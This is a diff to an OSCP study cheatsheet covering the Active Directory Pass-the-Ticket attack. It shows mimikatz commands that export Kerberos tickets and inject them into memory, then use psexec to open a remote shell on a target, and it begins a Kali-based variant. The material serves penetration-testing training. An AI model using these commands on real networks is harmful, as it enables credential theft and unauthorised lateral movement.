brianlam38/OSCP-2022/cheatsheet-active-directory.md

 ```

 ### Pass-the-Ticket

-* We authenticate as a user on a target host via. their Kerberos TGT rather than using their NTLM hash.
+Pass-the-Ticket takes advantage of the TGS by exporting service tickets, injecting them into memory (on target) or caching as environment variable (on Kali) and then authenticating with the injected/cached ticket via.
+Kerberos-based authN as opposed to NTLM-based authN.
+* This attack does not require the service/user to have local admin rights on the target.

 PTT via.
-COMPROMISED HOST
+COMPROMISED HOST (exporting -> inject into memory -> psexec.exe)
 ```powershell
 mimikatz> sekurlsa::tickets /export          # export tickets
 mimikatz> kerberos::ptt [ticket_name.kirbi]  # inject into memory
 cmd> psexec.exe \\target.hostname.com cmd    # authN to remote target using ticket
 ```

 PTT via.
-KALI
+KALI (exporting -> cache as env var -> psexec.py/smbexec.py/wmiexec.py)
 ```bash
 # export tickets -> copy to Kali
 mimikatz> sekurlsa::tickets /export